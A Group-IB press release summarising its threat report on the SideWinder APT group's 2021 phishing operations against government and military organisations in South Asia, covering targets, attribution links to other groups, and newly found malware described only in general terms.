Group-IB, a global cybersecurity leader headquartered in Singapore, has documented previously unreported phishing operations carried out by the nation-state cyber threat actor SideWinder between June and November 2021. The attackers attempted to target 61 government, military, law enforcement, and other organizations in Afghanistan, Bhutan, Myanmar, Nepal, and Sri Lanka. Group-IB’s Threat intelligence team was also able to attribute a 2020 attack on the Maldivian government to the SideWinder APT (advanced persistent threat) group and found evidence confirming SideWinder’s interest in cryptocurrency. Just like many other advanced threat actors, SideWinder started using the Telegram messaging app to receive information from compromised networks. In a new threat report “Old snake, new skin: Analysis of SideWinder APT activity between June and November 2021”, Group-IB researchers for the first time confirmed the links between the SideWinder, Baby Elephant, and Donot APT groups and described the entire arsenal of the cyberespionage group, including newly discovered tools.
Group-IB’s new report contains YARA rules for hunting the group and a table with the group’s TTPs (Tactics, Techniques, and Procedures) mapped to the MITRE ATT&CK® matrix, providing all the information companies and organizations needed to update their security controls to detect SideWinder.
Fast and venomous
SideWinder APT, also known as Rattlesnake, Hardcore Nationalist (HN2), and T-APT4, is one of the oldest nation-state threat actors that is believed to originate from India. The group has been carrying out cyber espionage attacks against government organizations in the Asia-Pacific region since at least 2012. In June 2022, Group-IB discovered the group’s newest custom tool, SideWinder.AntiBot.Script, which was used in previously documented phishing attacks against Pakistani organizations. SideWinder is notable for its ability to conduct hundreds of espionage operations within a short span of time.
During proactive threat-hunting operations, the Group-IB Threat Intelligence team discovered backup archives on infrastructure attributed to APT SideWinder. One of the 2021 archives contained several phishing projects designed to target government agencies in Southeast Asia, among which were fake websites imitating the Central Bank of Myanmar. Based on the date when the related phishing pages were edited, the Group-IB team was able to reconstruct an approximate timeline of SideWinder’s phishing operations between June and November 2021. As the phishing resources were retrieved from a backup archive by the Group-IB team, there is a possibility that SideWinder’s attacks may have started earlier.
Further analysis of SideWinder’s malicious infrastructure allowed the Group-IB team to compile a list of the group’s 61 potential targets, which includes government, military, financial, law enforcement, political, telecommunications, and media organizations in Afghanistan, Bhutan, Myanmar, Nepal, and Sri Lanka. It is not known whether any of these phishing campaigns were successful. Interestingly, Group-IB analysts discovered two phishing projects mimicking crypto companies. SideWinder’s growing interest in cryptocurrency could be linked to the recent attempts to regulate the crypto market in India.
Spear phishing has long been the group’s primary initial attack vector. The victim receives a phishing email containing a URL or a malicious attachment. The URL then downloads a malicious document, an LNK file, or a malicious payload. The LNK file downloads an HTA file, which in turn downloads the payload. The payload can be a reverse shell, a remote access Trojan (RAT), or an information stealer.
Among the newly discovered tools were SideWinder.RAT.b (a remote access Trojan) and SideWinder.StealerPy, a custom information stealer written in Python designed to exfiltrate information collected from the victim’s computer. The tool can extract a victim’s browsing history from Google Chrome, credentials saved in the browser, the list of folders in the directory, as well as meta information and contents of docx, pdf, and txt files, etc. Interestingly, both malware samples use the Telegram messaging app to receive data from compromised machines – an increasingly common trend among both APT groups and financially-motivated cybercriminals over the past year. Advanced attackers have started preferring Telegram over traditional command and control servers due to its convenience. Gathering and monitoring information about the attackers’ infrastructure in Telegram is essential to ensuring the protection of digital assets.
Based on the group’s malware samples and network IOCs extracted from them during the analysis, Group-IB researchers built a diagram of SideWinder’s network infrastructure for the first time. The description of the group’s entire arsenal can also be found in the report “Old snake, new skin: Analysis of SideWinder APT activity between June and November 2021”.
Optimize strategic, operational and tactical decision-making with best-in-class cyber threat analytics
Melting pot
Thanks to Group-IB’s patented Graph Network Analysis tool, Group-IB researchers were able to identify a large network infrastructure used by SideWinder. The overlaps between command-and-control servers as well as between the tools led the Group-IB team to conclude that BabyElephant and SideWinder are most likely the same or closely related APTs.
“It is not uncommon for APT groups to borrow tools from each other, which often leads to mistakes in attribution. As such, we discovered that some indicators of compromise related to another APT group, Donot, were wrongly attributed to SideWinder. Nonetheless, we found additional evidence confirming that Patchwork (Hangover), Donot, and SideWinder sometimes borrow tools and malicious documents from each other and adjust them for their needs.”
Senior malware analyst at Group-IB
The report “Old snake, new skin: Analysis of SideWinder APT activity between June and November 2021” is primarily intended for cybersecurity experts such as malware analysts, SOC, MDR, threat intelligence and threat hunting specialists, incident response teams, and cybersecurity system administrators at private and government organizations. The new report is available for download here.
